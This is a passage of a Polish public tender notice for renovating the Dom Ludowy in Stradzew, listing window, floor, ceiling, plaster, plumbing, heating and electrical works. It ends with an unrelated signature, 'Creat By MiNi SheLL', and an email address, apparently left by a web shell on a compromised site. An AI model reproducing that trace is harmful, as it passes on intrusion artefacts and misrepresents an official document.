W latach 2008 i 2009 wykonano wymianę dachu (więźba dachowa, pokrycie dachu blachą z folią paroprzepuszczalną), wewnętrzną instalację wod.kan.100%, instalację elektryczną 100%, instalację c.o. podpodłogową w pom.1.01,1.04, 1.10 i 1-12 (bez montażu grzejników), remont pomieszczeń 1.01, 1.09, 1.04, 1.10, 1.11, 1.12 oraz demontaż okienka podawczego i montaż drzwi D-1 w pom.1.02.


Kod CPV: 45450000-6 Roboty budowlane, wykończeniowe, pozostałe. 
Szczegółowy opis przedmiotu zamówienia stanowią załączniki: 
Załącznik nr 6 a                            Specyfikacja techniczna wykonania i odbioru robót budowlany	
Załącznik nr 7 a                             Dokumentacja projektowa 
Załącznik nr 8 a                             Przedmiar robót 
z zastrzeżeniem, że dokumenty te opisują szerszy zakres zamówienia niż objęty niniejszym postępowaniem. Wykonawcy korzystają z ww. dokumentacji w zakresie opisanym w szczegółowym opisie zakresu prac do wykonania. Przedmiar robót załączony jest pomocniczo i obejmuje wszystkie prace ujęte  w projekcie technicznym, natomiast wykonawcy sporządzają wycenę prac na podstawie własnej kalkulacji przedmiarowej jedynie w zakresie objętym niniejszym postępowaniem przetargowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja i wyposażenie Domu Ludowego w Stradzewie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie części z zakresu robót :

Rozbudowa, nadbudowa i przebudowa budynku Domu Ludowego w Stradzewie wraz          z niezbędną infrastrukturą techniczną i utwardzeniem terenu,

zgodnie z   pozwoleniem na budowę nr 116/2008 z dnia 27.02.2008 r., projektem budowlanym, oraz specyfikacją techniczną wykonania i odbioru robót budowlanych. 
     
 Szczegółowy opis zakresu robót do wykonania: 
                                                                                                           
Przedmiot zamówienia obejmuje wykonanie zgodnie z projektem:


- ROBÓT OGÓLNOBUDOWLANYCH tj.:
A. w pomieszczeniu 1.01, 1.02 i 2.01
1.	Wymiana stolarki okiennej i drzwiowej - w elewacji północno-zachodniej (tył budynku) zdemontować 3szt. okien 120 x 100cm, powiększyć otwór, zamontować 3 szt. okien PCV O-1 (wym.1165x1435mm, RU, szpros wewnątrzszybowy), w ścianie szczytowej (elewacja północno-wschodnia) wykuć otwory okienne 120 * 150cm, obrobić ościeża, zamontować okna O-1, w elewacji południowo-wschodniej (frontowa) zdemontować drzwi 100 x 250 szt.1 i 3 szt. okien 180 x 150cm szt.3, zgodnie z projektem przygotować otwory okienne i drzwiowe (częściowe zamurowanie otworów, częściowe wykucie otworów) oraz wnękę 70x65x25cm pod hydrant, obrobić ościeża, zamontować okna i drzwi. W części otworów należy zamontować nadproża prefabrykowane L-19. Zamontować parapety wewnętrzne PCV szer.30cm, wykonać spadki i zamontować parapety zewnętrzne z blachy stalowej powlekanej. Wskazane jest, aby okna PCV dostosować do już wymienionych w budynku (kształt ramy i szprosa), również parapety zewnętrzne. W 4 skrzydłach zamontować nawiewniki VENTAIR II lub równoważne.
2.	Podłoga  - wymiana istniejącej podłogi na płytki gresowe w technologi opisanej szczegółowo w projekcie.
3.	Sufit podwieszany - wykonać sufit podwieszany z płyt GKF na stelażu stalowym, który ma być zamontowany bezpośrednio do konstrukcji więźby dachowej. Wcześniej należy wykonać paroizolację na istniejącej wełnie mineralnej.
4.	Wykończenie ścian i podsufitki - skuć stare tynki, wykonać tynki cementowo- wapienne kat.III, pomalować dwukrotnie farbą ekologiczną akrylową w kolorze jasnym. Powierzchnie z płyt gipsowych pospoinować i zaszpachlować, a następnie pomalować dwukrotnie farbą ekologiczną akrylową.
5.	Zamontować wentylator dachowy Das160 wraz z przewodami wentylacyjnymi.
B. w pomieszczeniu 1.07
Wymurować studzienkę wodomierzową, zamontować właz, odbić stary tynk na ścianach i suficie, wykonać tynki cementowo- wapienne kat.III, do wysokości 2,05m ułożyć glazurę, ściany powyżej i sufit dwukrotnie pomalować farbą ekologiczną akrylową w kolorze jasnym, zamontować kratkę wentylacyjną, wykonać posadzkę z płytek gresowych, zamontować kratkę ściekową zgodnie z projektem.
II. ROBÓT  INSTAL. WOD.KAN. WEWNĘTRZNYCH
 - zakres zamówienia obejmuje montaż  hydrantu HP 25. Hydrant dostarczy inwestor.
III. ROBÓT INSTAL. C.O. 
Instalacja c.o.podpodłogowa w pom.1.01, 1.02  bez osprzętu. Wykonać próbę szczelności powietrzna.
IV. ROBÓT INSTAL. ELEKTRYCZNYCH tj. 
Wykonać instalację el. wewnętrzną w pom. 1.01, 1.02, 2.01 a w szczególności montaż opraw oświetleniowych szt.16, montaż 3 szt. wkładów oświetlenia awaryjnego, dokonać stosownych pomiarów instalacji. W wycenie nie uwzględniać wartości przewodów, opraw i wkładów oświetlenia awaryjnego -materiał dostarczy inwestor.

Zakres zamówienia  obejmuje również niezbędne do wykonania roboty towarzyszące ww. robotom m.in. wywóz gruzu z rozbiórek.

Uwaga:
W latach 2008 i 2009 wykonano wymianę dachu (więźba dachowa, pokrycie dachu blachą z folią paroprzepuszczalną i izolacją z wełny mineralnej), wewnętrzną instalację wod.kan. (bez montażu hydrantu HP 25), częściowo instalację elektryczną (bez pom.1.01, 1,02), instalację c.o. podpodłogową doprowadzono do pom.1.01 (bez montażu grzejników) oraz remont pozostałych pomieszczeń (bez pomieszczenia 1.01).

Kod CPV: 45450000-6 Roboty budowlane, wykończeniowe, pozostałe. 

Szczegółowy opis przedmiotu zamówienia stanowią załączniki: 
Załącznik nr 6 b                          Specyfikacja techniczna wykonania i odbioru robót budowlany	
Załącznik nr 7 b                          Dokumentacja projektowa 
Załącznik nr 8 b                          Przedmiar robót 
z zastrzeżeniem, że dokumenty te opisują szerszy zakres zamówienia niż objęty niniejszym postępowaniem. Wykonawcy korzystają z ww. dokumentacji w zakresie opisanym w szczegółowym opisie zakresu prac do wykonania. Przedmiar robót załączony jest pomocniczo i obejmuje wszystkie prace wymienione  w projekcie technicznym, natomiast wykonawcy sporządzają wycenę prac na podstawie własnej kalkulacji przedmiarowej jedynie w zakresie objętym niniejszym postępowaniem przetargowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com